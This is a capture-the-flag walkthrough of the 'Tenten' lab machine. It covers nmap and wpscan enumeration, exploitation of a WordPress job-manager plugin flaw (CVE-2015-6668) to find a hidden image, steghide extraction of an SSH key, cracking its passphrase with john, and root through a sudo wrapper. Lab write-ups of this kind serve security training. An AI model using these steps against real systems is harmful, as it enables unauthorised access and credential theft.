Difficulty Rating:

Machine: Tenten
OS: Linux
Target IP: 10.10.10.10
Source IP: 10.10.15.8

  • Nmap
$ sudo nmap -A -Pn -sV -O -oN tenten_nmap.txt 10.10.10.10

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-22 14:05 IST
Nmap scan report for 10.10.10.10
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.8 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.8 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   236.28 ms 10.10.14.1
2   236.89 ms 10.10.10.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.47 seconds
  • Wpscan
$ sudo wpscan -u http://10.10.10.10 -e --log tenten_wpscan.txt
[+] We found 1 plugins:

[+] Name: job-manager - v7.2.5
 |  Latest version: 0.7.25 (up to date)
 |  Last updated: 2015-08-25T22:44:00.000Z
 |  Location: http://10.10.10.10/wp-content/plugins/job-manager/
 |  Readme: http://10.10.10.10/wp-content/plugins/job-manager/readme.txt
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+-------+-------+
    | Id | Login | Name  |
    +----+-------+-------+
    | 1  | takis | takis |
    | 2  | user1 | user1 |
    +----+-------+-------+
  • The Job-manager plugin has a CVE-2015-6668
  • Visit http://10.10.10.10/index.php/ and click on Job Listing and click on Apply
  • In the URL you’ll see the URL is http://10.10.10.10/index.php/jobs/apply/8/
  • We see there’s a number in the end. It is an ID from the wordpress mysql database.

img1

  • Let’s fuzz for more pages
$ for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>'; done
1: <title>Job Application: Hello world! &#8211; Job Portal</title>
2: <title>Job Application: Sample Page &#8211; Job Portal</title>
3: <title>Job Application: Auto Draft &#8211; Job Portal</title>
4: <title>Job Application &#8211; Job Portal</title>
5: <title>Job Application: Jobs Listing &#8211; Job Portal</title>
6: <title>Job Application: Job Application &#8211; Job Portal</title>
7: <title>Job Application: Register &#8211; Job Portal</title>
8: <title>Job Application: Pen Tester &#8211; Job Portal</title>
9: <title>Job Application:  &#8211; Job Portal</title>
10: <title>Job Application: Application &#8211; Job Portal</title>
11: <title>Job Application: cube &#8211; Job Portal</title>
12: <title>Job Application: Application &#8211; Job Portal</title>
13: <title>Job Application: HackerAccessGranted &#8211; Job Portal</title>
14: <title>Job Application: Application &#8211; Job Portal</title>
15: <title>Job Application: Application &#8211; Job Portal</title>
16: <title>Job Application: Application &#8211; Job Portal</title>
17: <title>Job Application: Application &#8211; Job Portal</title>
18: <title>Job Application: Application &#8211; Job Portal</title>
19: <title>Job Application: shell &#8211; Job Portal</title>
20: <title>Job Application: Application &#8211; Job Portal</title>
  • The content on 13th line HackerAccessGranted looks interesting.
  • According to the CVE:

The wordpress directory structure for the uploaded files is known as /wp-content/uploads/%year%/%month%/%filename%

  • Visit http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
  • Download the image
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
  • Use steghide with no passphrase
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase: 
wrote extracted data to "id_rsa".
  • Use sshng2john
$ python sshng2john.py id_rsa > id_rsa.encrypted
  • Use john to get passphrase
$ john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH-ng [RSA/DSA 32/64])
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword    (id_rsa)
1g 0:00:00:12 DONE (2017-08-22 16:28) 0.07782g/s 1116Kp/s 1116Kc/s 1116KC/s *7¡Vamos!
Session completed
  • SSH
$ ssh -i id_rsa [email protected]
[email protected]:~$ sudo -l
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin
[email protected]:~$ fuckin
[email protected]:~$ fuckin ls
user.txt
[email protected]:~$ fuckin id
uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
[email protected]:~$ strings /bin/fuckin
#!/bin/bash
$1 $2 $3 $4
[email protected]:~$ sudo fuckin id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~$ sudo fuckin cat /root/root.txt
XXXXXX
User and Root owned!!

Share the fun!